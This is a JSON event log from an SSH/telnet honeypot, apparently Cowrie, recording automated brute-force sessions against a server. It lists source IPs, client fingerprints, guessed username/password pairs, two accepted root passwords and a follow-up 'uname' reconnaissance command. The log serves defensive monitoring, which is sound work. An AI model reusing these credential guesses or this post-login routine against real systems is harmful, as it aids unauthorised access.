ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:16:15.784662Z","src_ip":"212.227.235.229","session":"2f5548679d5f"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle123","message":"login attempt [oracle/oracle123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:16:16.358503Z","src_ip":"212.227.235.229","session":"2f5548679d5f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:16:17.505352Z","src_ip":"212.227.235.229","session":"2f5548679d5f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41776,"dst_ip":"1.2.3.4","dst_port":22,"session":"8275d2f051fc","protocol":"ssh","message":"New connection: 212.227.235.229:41776 (1.2.3.4:22) [session: 8275d2f051fc]","sensor":"my-vps","timestamp":"2025-08-28T06:16:20.438946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:16:20.440058Z","src_ip":"212.227.235.229","session":"8275d2f051fc"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T06:16:20.690245Z","src_ip":"212.227.235.229","session":"8275d2f051fc"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:16:28.439598Z","src_ip":"212.227.235.229","session":"8275d2f051fc"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":49268,"dst_ip":"1.2.3.4","dst_port":23,"session":"ce2b890a24b2","protocol":"telnet","message":"New connection: 8.222.212.69:49268 (1.2.3.4:23) [session: ce2b890a24b2]","sensor":"my-vps","timestamp":"2025-08-28T06:16:29.480913Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44398,"dst_ip":"1.2.3.4","dst_port":22,"session":"f834d1e1babf","protocol":"ssh","message":"New connection: 212.227.235.229:44398 (1.2.3.4:22) [session: f834d1e1babf]","sensor":"my-vps","timestamp":"2025-08-28T06:16:31.443023Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:16:31.444924Z","src_ip":"212.227.235.229","session":"f834d1e1babf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:16:31.588421Z","src_ip":"212.227.235.229","session":"f834d1e1babf"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:16:32.176138Z","src_ip":"212.227.235.229","session":"f834d1e1babf"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:16:33.324143Z","src_ip":"212.227.235.229","session":"f834d1e1babf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48318,"dst_ip":"1.2.3.4","dst_port":22,"session":"d52b922c36c4","protocol":"ssh","message":"New connection: 212.227.125.160:48318 (1.2.3.4:22) [session: d52b922c36c4]","sensor":"my-vps","timestamp":"2025-08-28T06:16:37.907528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:16:37.952420Z","src_ip":"212.227.125.160","session":"d52b922c36c4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:16:38.055606Z","src_ip":"212.227.125.160","session":"d52b922c36c4"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-28T06:16:38.435660Z","src_ip":"212.227.125.160","session":"d52b922c36c4"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:16:39.580034Z","src_ip":"212.227.125.160","session":"d52b922c36c4"}
{"eventid":"cowrie.session.connect","src_ip":"202.85.46.173","src_port":39498,"dst_ip":"1.2.3.4","dst_port":23,"session":"d61d586d7503","protocol":"telnet","message":"New connection: 202.85.46.173:39498 (1.2.3.4:23) [session: d61d586d7503]","sensor":"my-vps","timestamp":"2025-08-28T06:16:43.020554Z"}
{"eventid":"cowrie.session.closed","duration":31.363163232803345,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:16:43.330379Z","src_ip":"8.222.212.69","session":"e259baccd050"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33116,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cdda40fca96","protocol":"ssh","message":"New connection: 212.227.235.229:33116 (1.2.3.4:22) [session: 1cdda40fca96]","sensor":"my-vps","timestamp":"2025-08-28T06:16:52.722220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:16:52.723042Z","src_ip":"212.227.235.229","session":"1cdda40fca96"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:16:52.868031Z","src_ip":"212.227.235.229","session":"1cdda40fca96"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang","message":"login attempt [wang/wang] failed","sensor":"my-vps","timestamp":"2025-08-28T06:16:53.313063Z","src_ip":"212.227.235.229","session":"1cdda40fca96"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:16:54.546412Z","src_ip":"212.227.235.229","session":"1cdda40fca96"}
{"eventid":"cowrie.session.closed","duration":13.101463317871094,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:16:56.121947Z","src_ip":"202.85.46.173","session":"d61d586d7503"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47988,"dst_ip":"1.2.3.4","dst_port":22,"session":"54adb4924026","protocol":"ssh","message":"New connection: 212.227.235.229:47988 (1.2.3.4:22) [session: 54adb4924026]","sensor":"my-vps","timestamp":"2025-08-28T06:17:00.243675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:17:00.244995Z","src_ip":"212.227.235.229","session":"54adb4924026"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:17:00.392271Z","src_ip":"212.227.235.229","session":"54adb4924026"}
{"eventid":"cowrie.login.failed","username":"www","password":"www123","message":"login attempt [www/www123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:17:00.829562Z","src_ip":"212.227.235.229","session":"54adb4924026"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:01.978349Z","src_ip":"212.227.235.229","session":"54adb4924026"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44100,"dst_ip":"1.2.3.4","dst_port":22,"session":"42987ec72355","protocol":"ssh","message":"New connection: 212.227.125.160:44100 (1.2.3.4:22) [session: 42987ec72355]","sensor":"my-vps","timestamp":"2025-08-28T06:17:08.111235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:17:08.120665Z","src_ip":"212.227.125.160","session":"42987ec72355"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:17:08.330877Z","src_ip":"212.227.125.160","session":"42987ec72355"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47948,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c3f8a167f44","protocol":"ssh","message":"New connection: 212.227.125.160:47948 (1.2.3.4:22) [session: 9c3f8a167f44]","sensor":"my-vps","timestamp":"2025-08-28T06:17:08.685251Z"}
{"eventid":"cowrie.session.closed","duration":39.237900733947754,"message":"Connection lost after 39 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:08.718747Z","src_ip":"8.222.212.69","session":"ce2b890a24b2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:17:08.739192Z","src_ip":"212.227.125.160","session":"9c3f8a167f44"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:17:08.796280Z","src_ip":"212.227.125.160","session":"9c3f8a167f44"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:17:09.221096Z","src_ip":"212.227.125.160","session":"42987ec72355"}
{"eventid":"cowrie.login.success","username":"root","password":"Ac123456","message":"login attempt [root/Ac123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:17:09.265517Z","src_ip":"212.227.125.160","session":"9c3f8a167f44"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:17:09.535786Z","src_ip":"212.227.125.160","session":"9c3f8a167f44"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:17:09.536528Z","src_ip":"212.227.125.160","session":"9c3f8a167f44"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:09.641096Z","src_ip":"212.227.125.160","session":"9c3f8a167f44"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:09.642265Z","src_ip":"212.227.125.160","session":"9c3f8a167f44"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:17:10.321393Z","src_ip":"212.227.125.160","session":"42987ec72355"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:17:10.322147Z","src_ip":"212.227.125.160","session":"42987ec72355"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:11.033859Z","src_ip":"212.227.125.160","session":"42987ec72355"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:11.035079Z","src_ip":"212.227.125.160","session":"42987ec72355"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37520,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cdff7169fde","protocol":"ssh","message":"New connection: 212.227.235.229:37520 (1.2.3.4:22) [session: 4cdff7169fde]","sensor":"my-vps","timestamp":"2025-08-28T06:17:14.505495Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:17:14.526370Z","src_ip":"212.227.235.229","session":"4cdff7169fde"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:17:14.758577Z","src_ip":"212.227.235.229","session":"4cdff7169fde"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:17:15.764050Z","src_ip":"212.227.235.229","session":"4cdff7169fde"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:17:16.292865Z","src_ip":"212.227.235.229","session":"4cdff7169fde"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:17:16.366848Z","src_ip":"212.227.235.229","session":"4cdff7169fde"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:16.619536Z","src_ip":"212.227.235.229","session":"4cdff7169fde"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:17:16.620624Z","src_ip":"212.227.235.229","session":"4cdff7169fde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36060,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4caab7cf671","protocol":"ssh","message":"New connection: 212.227.235.229:36060 (1.2.3.4:22) [session: f4caab7cf671]","sensor":"my-vps","timestamp":"2025-08-28T06:17:22.160986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:17:22.166788Z","src_ip":"212.227.235.229","session":"f4caab7cf671"}
